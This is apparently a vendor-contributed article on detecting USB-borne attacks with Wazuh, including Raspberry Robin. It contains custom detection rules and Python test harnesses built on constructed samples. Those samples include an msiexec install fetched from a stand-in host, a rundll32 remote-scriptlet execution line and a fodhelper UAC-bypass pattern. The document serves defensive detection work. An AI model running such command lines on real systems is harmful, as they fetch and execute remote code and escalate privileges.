Defending against USB drive attacks with Wazuh

The Hacker News
March 5, 2025


USB drive attacks are a significant cybersecurity risk: they take advantage of the everyday use of USB devices to deliver malware and, because the payload arrives on removable media rather than over the network, they bypass perimeter controls such as firewalls and email filtering. Successful attacks can lead to data breaches, financial losses and operational disruptions, with lasting damage to an organization’s reputation. A well-known example is the Stuxnet worm, discovered in 2010, which targeted industrial control systems, specifically those at Iran’s nuclear enrichment facilities. It exploited multiple zero-day vulnerabilities and spread primarily through USB drives, making it one of the first publicly documented cyberattacks with real-world physical effects. Stuxnet exposed the risks of removable media and raised global awareness of cybersecurity threats to critical infrastructure.

How USB drive attacks propagate

Attackers use various methods to deliver malicious payloads via USB drives, targeting individuals and organizations.

  • Drop attacks: Infected USB drives are deliberately left in public areas, such as parking lots, to entice victims to plug them in and infect their computers.
  • Mail-based attacks: USB drives are sent to targets via mail, disguised as promotional items or legitimate devices, to trick them into plugging them into their systems.
  • Social engineering: Attackers use psychological tactics to persuade victims to connect infected USB drives to their computers.
  • Unsolicited plugging: Attackers plug infected USB drives into unattended systems, spreading malware without victim interaction.

How USB drive attacks work

USB drive attacks typically follow a multi-step process to infiltrate systems and cause damage.

  • Reconnaissance: Attackers research their target to identify potential vulnerabilities. In this case, they may gather information about the organization, its employees, and its operational environment to determine the likelihood of someone using a USB drive.
  • Weaponization: Threat actors prepare the USB drive by embedding malware. This can be achieved by directly infecting the drive or crafting a seemingly benign file, such as a document, video, or image, which contains hidden malicious code.
  • Delivery: Attackers distribute the infected USB drive to targets by dropping it in public areas, giving it away as a promotional item, or using social engineering to deliver it.
  • Exploitation: When the target connects the USB drive, the malware runs either automatically, by exploiting a vulnerability in how the host handles the device or its files, or through user interaction, such as opening a disguised document or shortcut.
  • Installation: The malware installs itself on the target system and establishes persistence, so the attacker keeps control of the device even after it is rebooted or the drive is removed.
  • Command and Control (C2): The malware communicates with the attacker’s server. This enables the attacker to issue commands, exfiltrate data, or deploy additional payloads.
  • Actions on Objectives: The attackers achieve their goals, such as stealing sensitive data, deploying ransomware, or establishing persistent access for future exploitation.
Figure 1: Steps showing how USB drive attacks work.

Enhance your cybersecurity posture against USB drive attacks with Wazuh

Wazuh is an open source security platform that helps organizations detect and respond to security threats by monitoring system activity, from informational events to critical incidents. By monitoring USB activity with Wazuh, organizations can spot unauthorized removable media early and reduce the risk of a breach or data leak.

Monitoring USB drive activities in Windows using Wazuh

Wazuh monitors USB drive activity on Windows endpoints using the Audit PNP Activity audit policy. This policy logs Plug and Play (PnP) events to the Security log, which makes it possible to identify when a USB drive is connected. It is available on Windows 10 Pro, Windows 11 Pro, Windows Server 2016 and later.

Organizations can configure Wazuh to collect these events and focus on Windows event ID 6416, which is logged when the system recognizes a new external device. Note that 6416 fires for every PnP device (keyboards, mice, hubs, webcams), so rules that target removable storage should narrow the match using the event’s device class or the DeviceID prefix (for example USBSTOR). Security administrators can then create custom Wazuh rules that turn USB device connections into alerts and flag potential security incidents.

The next step is to create a Constant Database (CDB) list of the unique device identifiers (DeviceIDs) of permitted drives. This list lets Wazuh differentiate between authorized and unauthorized devices and generate alerts for both categories: when an authorized USB drive is plugged in, a low-severity alert is raised for audit purposes, while an unauthorized connection generates a high-severity alert that indicates a potential policy violation or security breach.

Figure 2: USB drive plug-in events on a monitored Windows endpoint.
Figure 3: Authorized USB drive event.
Figure 4: Unauthorized USB drive event.
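The procedure above, from the 6416 event through the CDB lookup to the two alert levels, is easy to get subtly wrong (a DeviceID that does not match byte for byte, or a keyboard that trips the "unauthorized device" rule). The following Python script is an added example, not Wazuh’s own code: it reproduces the rule logic in plain Python so that the DeviceID filter and the allow list can be tested before the rules and the CDB list are deployed. The decoded field names (win.eventdata.deviceId and so on), the DeviceID strings, the alert levels and the sample events are all constructed for this example.

```python
"""Classify Windows event ID 6416 (Audit PNP Activity) records against a
CDB-style allow list of USB storage DeviceIDs.

Added example, not Wazuh's own code. It mirrors the decision a pair of
custom Wazuh rules makes so the parsing and the lookup can be unit-tested.
Field names, DeviceIDs and alert levels are assumptions for the example.
"""
from __future__ import annotations

import re

# CDB lists are "key:value" lines; the key is the full PnP DeviceID of an
# approved drive, exactly as event 6416 reports it. Constructed sample.
CDB_ALLOWED_DEVICES = r"""
USBSTOR\Disk&Ven_SanDisk&Prod_Cruzer_Glide&Rev_1.00\4C530001230725118063&0:allowed
USBSTOR\Disk&Ven_Kingston&Prod_DataTraveler_3.0&Rev_PMAP\0019E06B2F5CBB81A7C5B09B&0:allowed
"""

# Assumed alert levels for the two custom rules (authorized vs. not).
LEVEL_AUTHORIZED = 5
LEVEL_UNAUTHORIZED = 12

# Event 6416 fires for every recognized PnP device (keyboards, mice, hubs),
# so the rules narrow it to USB mass storage via the DeviceID prefix.
USB_STORAGE_ID = re.compile(r"^USBSTOR\\", re.IGNORECASE)


def parse_cdb(text: str) -> dict[str, str]:
    """Parse 'key:value' CDB lines into a dict. The last ':' separates key
    from value, so DeviceIDs (which contain no colon) survive intact."""
    entries: dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.rpartition(":")
        entries[key] = value
    return entries


def classify(event: dict, allowed: dict[str, str]) -> dict | None:
    """Return an alert for a USB storage plug-in, or None when the event is
    not a 6416 record for a USB storage device (no alert, like the rules)."""
    if event.get("win.system.eventID") != "6416":
        return None
    device_id = event.get("win.eventdata.deviceId", "")
    if not USB_STORAGE_ID.search(device_id):
        return None
    authorized = device_id in allowed          # exact match, as a CDB lookup
    return {
        "computer": event.get("win.system.computer", "?"),
        "device_id": device_id,
        "description": event.get("win.eventdata.deviceDescription", ""),
        "authorized": authorized,
        "level": LEVEL_AUTHORIZED if authorized else LEVEL_UNAUTHORIZED,
    }


# Constructed records shaped like the decoded fields of a Security-channel
# event: an approved drive, an unknown drive, and a USB mouse (HID).
SAMPLE_EVENTS = [
    {"win.system.eventID": "6416", "win.system.computer": "WKS-01",
     "win.eventdata.deviceId": r"USBSTOR\Disk&Ven_SanDisk&Prod_Cruzer_Glide&Rev_1.00\4C530001230725118063&0",
     "win.eventdata.deviceDescription": "SanDisk Cruzer Glide USB Device"},
    {"win.system.eventID": "6416", "win.system.computer": "WKS-01",
     "win.eventdata.deviceId": r"USBSTOR\Disk&Ven_Generic&Prod_Flash_Disk&Rev_8.07\BADC0FFEE0DDF00D&0",
     "win.eventdata.deviceDescription": "Generic Flash Disk USB Device"},
    {"win.system.eventID": "6416", "win.system.computer": "WKS-01",
     "win.eventdata.deviceId": r"HID\VID_046D&PID_C52B&MI_00\7&2A1B3C4D&0&0000",
     "win.eventdata.deviceDescription": "USB Input Device"},
]


def run(events=SAMPLE_EVENTS, cdb_text=CDB_ALLOWED_DEVICES) -> list[dict]:
    """Evaluate every event; only USB storage plug-ins produce alerts."""
    allowed = parse_cdb(cdb_text)
    return [a for a in (classify(e, allowed) for e in events) if a]


if __name__ == "__main__":
    for alert in run():
        tag = "authorized" if alert["authorized"] else "UNAUTHORIZED"
        print(f"level {alert['level']:>2} {tag:<12} {alert['computer']} {alert['device_id']}")
```

Running it yields two alerts, level 5 for the SanDisk drive on the list and level 12 for the unknown flash disk, and nothing for the mouse. The same exact-match behaviour applies to the real CDB lookup: a DeviceID copied with a different case or a trailing space will be treated as unauthorized, so populate the list from the 6416 events themselves rather than by hand.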

Threat detection use case: Detecting the Raspberry Robin USB-Drive activities

Wazuh can also detect USB-borne threats such as Raspberry Robin, a Windows worm that spreads through infected USB drives.

Raspberry Robin targets industries like oil, gas, transportation, and tech, causing operational disruptions. It spreads via disguised .lnk files, gains persistence by updating the UserAssist registry, and mimics legitimate folders. The worm uses legitimate Windows processes such as msiexec.exe, rundll32.exe, odbcconf.exe, and fodhelper.exe to execute, persist, and download additional malicious components. Its reliance on TOR-based command and control (C2) servers for outbound communication adds stealth and complicates detection.

Wazuh detects Raspberry Robin by monitoring registry modifications, unusual command execution patterns and suspicious use of system binaries. Its file integrity monitoring and threat detection rules identify the malicious activity in near real time, and its active response capability can act on the alert. The behaviours it watches for, and the responses it can take, include:

  • Anomalous cmd.exe command lines: alerting, terminating the suspicious process or isolating the affected endpoint.
  • msiexec.exe downloading packages from obscure domains: alerting administrators and blocking the connection.
  • UAC bypass via fodhelper.exe: terminating the spawned process and notifying administrators.
  • Unusual outbound connections by rundll32.exe and dllhost.exe: blocking the connection.

Below is a sample custom rule set that detects possible Raspberry Robin activity. The rules match on process-creation fields (image, command line, parent image, original file name) that come from Sysmon, so Sysmon must be installed on the endpoint and its event channel collected by the Wazuh agent.


<group name="raspberry_robin,">

<!-- cmd.exe re-invoking cmd with /R or /C, as seen when the disguised .lnk runs -->
<rule id="100100" level="12">
    <if_sid>92004</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)cmd\.exe$</field>
    <field name="win.eventdata.commandLine" type="pcre2">(?i)cmd\.exe.+((/r)|(/v.+/c)|(/c)).*cmd</field>
    <description>Possible Raspberry Robin execution on $(win.system.computer)</description>
    <mitre>
        <id>T1059.003</id>
    </mitre>
</rule>

<!-- msiexec fetching and silently installing a package from a URL -->
<rule id="100101" level="7">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)msiexec\.exe$</field>
    <field name="win.eventdata.commandLine" type="pcre2">(?i)msiexec.*(/q|-q|/i|-i).*(/q|-q|/i|-i).*http[s]{0,1}://.+(\.msi){0,1}</field>
    <description>msiexec.exe downloading and executing packages on $(win.system.computer)</description>
    <mitre>
        <id>T1218.007</id>
    </mitre>
</rule>

<!-- shell or rundll32 spawned by the auto-elevating fodhelper.exe -->
<rule id="100103" level="12">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.originalFileName" type="pcre2">(?i)(cmd|powershell|rundll32)\.exe</field>
    <field name="win.eventdata.parentImage" type="pcre2">(?i)fodhelper\.exe</field>
    <description>Use of fodhelper.exe to bypass UAC on $(win.system.computer)</description>
    <mitre>
        <id>T1548.002</id>
    </mitre>
</rule>

<!-- scriptlet execution via GetObject("script:...") from a signed binary;
     dots and parentheses are escaped so the pattern matches them literally -->
<rule id="100105" level="10">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.commandLine" type="pcre2">(regsvr32\.exe|rundll32\.exe|dllhost\.exe).*";document\.write\(\);GetObject\("script:.*"\)\.Exec\(\)</field>
    <description>Possible Raspberry Robin execution on $(win.system.computer)</description>
    <mitre>
        <id>T1218.011</id>
    </mitre>
</rule>

</group>
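Rule regexes are the part of a detection most likely to be silently wrong, so it pays to exercise them against known-good and known-bad command lines before loading them on the manager. The script below is an added example, not Wazuh’s own tooling: it parses a copy of the four rules above (with regex metacharacters such as `\.` and `\(` escaped so they match literally), evaluates every `<field>` condition against constructed Sysmon process-creation events, and expands the `$(win.system.computer)` placeholder in the description. Python’s re module stands in for PCRE2; the constructs these rules use (inline `(?i)`, `{0,1}`, alternation) behave identically in both. `<if_sid>` parent chaining is not emulated: all sample events are taken to be Sysmon event ID 1 records. The command lines are constructed for the example, not captured samples.

```python
"""Evaluate Wazuh-style rule regexes against constructed Sysmon events.

Added example, not Wazuh's own code. The XML below copies the four
Raspberry Robin rules with metacharacters escaped. Python's re module is
used in place of PCRE2; <if_sid> chaining is not emulated.
"""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

RULES_XML = r"""
<group name="raspberry_robin,">
  <rule id="100100" level="12">
    <if_sid>92004</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)cmd\.exe$</field>
    <field name="win.eventdata.commandLine" type="pcre2">(?i)cmd\.exe.+((/r)|(/v.+/c)|(/c)).*cmd</field>
    <description>Possible Raspberry Robin execution on $(win.system.computer)</description>
  </rule>
  <rule id="100101" level="7">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)msiexec\.exe$</field>
    <field name="win.eventdata.commandLine" type="pcre2">(?i)msiexec.*(/q|-q|/i|-i).*(/q|-q|/i|-i).*http[s]{0,1}://.+(\.msi){0,1}</field>
    <description>msiexec.exe downloading and executing packages on $(win.system.computer)</description>
  </rule>
  <rule id="100103" level="12">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.originalFileName" type="pcre2">(?i)(cmd|powershell|rundll32)\.exe</field>
    <field name="win.eventdata.parentImage" type="pcre2">(?i)fodhelper\.exe</field>
    <description>Use of fodhelper.exe to bypass UAC on $(win.system.computer)</description>
  </rule>
  <rule id="100105" level="10">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.commandLine" type="pcre2">(regsvr32\.exe|rundll32\.exe|dllhost\.exe).*";document\.write\(\);GetObject\("script:.*"\)\.Exec\(\)</field>
    <description>Possible Raspberry Robin execution on $(win.system.computer)</description>
  </rule>
</group>
"""


def load_rules(xml_text: str) -> list[dict]:
    """Read id, level, description and compiled <field> regexes per rule."""
    root = ET.fromstring(xml_text.strip())
    rules = []
    for node in root.iter("rule"):
        rules.append({
            "id": int(node.get("id")),
            "level": int(node.get("level")),
            "description": node.findtext("description", ""),
            "fields": [(f.get("name"), re.compile(f.text)) for f in node.findall("field")],
        })
    return rules


def render(template: str, event: dict) -> str:
    """Expand $(field) references the way rule descriptions do."""
    return re.sub(r"\$\(([\w.]+)\)", lambda m: event.get(m.group(1), m.group(0)), template)


def match_rules(event: dict, rules: list[dict]) -> list[dict]:
    """Return every rule whose <field> regexes all match (a missing field
    is an empty string, so a rule on that field cannot fire)."""
    hits = []
    for rule in rules:
        if all(rx.search(event.get(name, "")) for name, rx in rule["fields"]):
            hits.append({"id": rule["id"], "level": rule["level"],
                         "description": render(rule["description"], event)})
    return hits


def sysmon_event(image: str, command_line: str,
                 parent_image: str = r"C:\Windows\explorer.exe",
                 original: str | None = None) -> dict:
    """Build a decoded Sysmon event ID 1 record (field names assumed)."""
    return {
        "win.system.computer": "WKS-01",
        "win.system.eventID": "1",
        "win.eventdata.image": image,
        "win.eventdata.commandLine": command_line,
        "win.eventdata.parentImage": parent_image,
        "win.eventdata.originalFileName": original or image.rsplit("\\", 1)[-1],
    }


# Constructed samples: four that should each trip exactly one rule, and a
# benign local MSI install that must stay quiet.
SAMPLE_EVENTS = {
    "lnk_cmd": sysmon_event(r"C:\Windows\System32\cmd.exe",
                            r'"C:\Windows\System32\cmd.exe" /R cmd<usb_drive.lnk'),
    "msiexec_remote": sysmon_event(r"C:\Windows\System32\msiexec.exe",
                                   "msiexec /q /i http://example-bad.test/pkg.msi"),
    "msiexec_local": sysmon_event(r"C:\Windows\System32\msiexec.exe",
                                  r"msiexec /i C:\Installers\app.msi /qn"),
    "fodhelper_child": sysmon_event(r"C:\Windows\System32\cmd.exe",
                                    r'"C:\Windows\System32\cmd.exe" /c whoami',
                                    parent_image=r"C:\Windows\System32\fodhelper.exe",
                                    original="Cmd.Exe"),
    "script_getobject": sysmon_event(
        r"C:\Windows\System32\rundll32.exe",
        r'C:\Windows\System32\rundll32.exe SHELL32.DLL,ShellExec_RunDLLA "x";'
        r'document.write();GetObject("script:http://example-bad.test/s.sct").Exec()'),
}

if __name__ == "__main__":
    rules = load_rules(RULES_XML)
    for name, event in SAMPLE_EVENTS.items():
        hits = match_rules(event, rules) or [{"id": "-", "level": 0, "description": "no match"}]
        for h in hits:
            print(f"{name:<18} {h['id']:>6} L{h['level']:<2} {h['description']}")
```

The value of the harness is the negative case as much as the positive ones: the benign local `msiexec /i ... /qn` line contains both switches that rule 100101 looks for and still produces no alert, because the pattern also requires a URL. When you tune a regex, add the benign command lines from your own fleet here first and keep them quiet.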
    
Figure 5: Raspberry Robin IoCs and behaviors detected on a monitored Windows endpoint.
Figure 6: An alert showing the Raspberry Robin IoCs detected on a monitored Windows endpoint.

For more details on detecting the Raspberry Robin worm using Wazuh, please visit this blog.

Monitoring USB drives in Linux using Wazuh

USB drives also introduce security risks on Linux endpoints, as vectors for malware and for unauthorized data access. udev is the Linux device manager: it detects and handles external devices such as USB drives when they are plugged in and creates the corresponding device nodes under /dev so the system can use them. Administrators can write custom udev rules that run a program on each plug-in or removal and so produce detailed events about USB activity. Wazuh ships built-in rules for USB monitoring, but udev-generated events carry richer details (vendor, model and serial number), which improves threat detection.

We configure udev rules on the Linux endpoints to trigger a logging script whenever a USB device is connected. The Wazuh agent is then configured to read the JSON log file that the script produces, so the manager can process and analyze the USB activity.

As with the Windows USB drive monitoring, you need a CDB list of authorized USB device serial numbers. Wazuh compares incoming connection events against this list and triggers alerts for devices that are not on it.
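The following script is an added example of the agent-side half of that setup, not the script from the Wazuh blog. A udev RUN+= rule invokes it on every USB device add or remove; udev passes the device’s properties (ID_VENDOR_ID, ID_MODEL_ID, ID_SERIAL_SHORT and so on, populated by udev’s usb_id builtin) as environment variables, and the script appends one JSON object per line to a log file that the Wazuh agent reads with the json log format. The log path, the udev rule text, the field names and the sample environment are this example’s own assumptions; the serial-number comparison against the CDB list happens on the manager, as described above, and is not repeated here.

```python
#!/usr/bin/env python3
"""Log USB device plug/unplug events as JSON lines for the Wazuh agent.

Added example, not the Wazuh blog's script. udev runs it via RUN+= and
passes device properties as environment variables. Path, field names and
the udev rule text are assumptions for this example.
"""
from __future__ import annotations

import json
import os
import socket
import time

# Assumed log path; override with USB_LOG_PATH when testing by hand.
LOG_PATH = os.environ.get("USB_LOG_PATH", "/var/log/usb-events.json")

# Assumed udev rule, e.g. /etc/udev/rules.d/90-usb-log.rules. The number
# must be above 50 so udev's usb_id builtin has already filled in
# ID_VENDOR_ID / ID_MODEL_ID / ID_SERIAL_SHORT. RUN+= programs need absolute
# paths and must return quickly; appending one line is fine.
UDEV_RULE = (
    'ACTION=="add|remove", SUBSYSTEM=="usb", ENV{DEVTYPE}=="usb_device", '
    'RUN+="/usr/local/bin/usb_log.py"'
)

# Matching <localfile> entry for the agent's ossec.conf (assumed).
WAZUH_LOCALFILE = """
<localfile>
  <log_format>json</log_format>
  <location>/var/log/usb-events.json</location>
</localfile>
"""

# udev property -> JSON field. Missing properties become empty strings so
# a manager rule that matches on usb.serial never sees an absent key.
FIELD_MAP = {
    "ACTION": "action",
    "DEVNAME": "devname",
    "ID_VENDOR_ID": "vendor_id",
    "ID_MODEL_ID": "product_id",
    "ID_VENDOR": "vendor",
    "ID_MODEL": "model",
    "ID_SERIAL_SHORT": "serial",
}


def build_event(env: dict, hostname: str | None = None,
                now: float | None = None) -> dict:
    """Shape the udev environment into the JSON object the agent will read."""
    usb = {field: env.get(var, "") for var, field in FIELD_MAP.items()}
    return {
        "timestamp": time.strftime("%Y-%m-%dT%H:%M:%S%z", time.localtime(now)),
        "hostname": hostname or socket.gethostname(),
        "source": "udev",
        "usb": usb,
    }


def append_event(event: dict, path: str = LOG_PATH) -> str:
    """Append one compact JSON line; Wazuh's json log_format reads one
    object per line, so the event must not contain raw newlines."""
    line = json.dumps(event, separators=(",", ":"))
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(line + "\n")
    return line


# Constructed environment, as udev would pass it for a plugged-in drive.
SAMPLE_ENV = {
    "ACTION": "add",
    "DEVNAME": "/dev/bus/usb/001/007",
    "ID_VENDOR_ID": "0781",
    "ID_MODEL_ID": "5567",
    "ID_VENDOR": "SanDisk",
    "ID_MODEL": "Cruzer_Blade",
    "ID_SERIAL_SHORT": "4C530001230725118063",
}

if __name__ == "__main__":
    # Under udev the real properties are in os.environ; fall back to the
    # constructed sample when run by hand outside udev.
    env = os.environ if "ID_VENDOR_ID" in os.environ else SAMPLE_ENV
    print(append_event(build_event(env)))
```

Matching on SUBSYSTEM=="usb" with DEVTYPE usb_device captures every USB device, storage or not, which is what you want for an inventory of what gets plugged in; to log only mass storage, match SUBSYSTEM=="block" with ENV{ID_BUS}=="usb" instead. After installing the rule, reload it with `udevadm control --reload` and check the generated line with `udevadm test` before pointing the agent at the file.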

Figure 7: USB drive alerts for a monitored Linux endpoint.
Figure 8: An unauthorized USB drive event on a monitored Linux endpoint.

The blog post on Monitoring USB drives in Linux using Wazuh provides more information on monitoring USB drives plugged into Linux endpoints.

Monitoring USB drives in macOS using Wazuh

On macOS endpoints you can use a custom script to log USB device events and then configure Wazuh to monitor that log. The script queries macOS’s I/O Kit framework for the attached USB devices and records connection and disconnection events together with each drive’s vendor ID, product ID and serial number, formatted as JSON and written to a log file. The Wazuh agent forwards this log to the Wazuh server for analysis, where the same serial-number allow-list approach applies.

The blog post on Monitoring USB drives in macOS using Wazuh shows the steps to monitor USB drives on macOS endpoints.

Figure 9: USB drive alerts on a monitored macOS endpoint.
Figure 10: Unauthorized USB drive alert on a monitored macOS endpoint.

Conclusion

USB drive attacks pose a security risk on every major operating system, giving malicious actors a vector for malware propagation and unauthorized access that does not pass through the network perimeter.

Wazuh offers various detection mechanisms to increase the chances of detecting USB Drive attacks and mitigate the potential impact. Organizations can enhance cybersecurity by integrating these detection methods and enforcing strict USB access policies.

This article is a contributed piece from one of our valued partners.




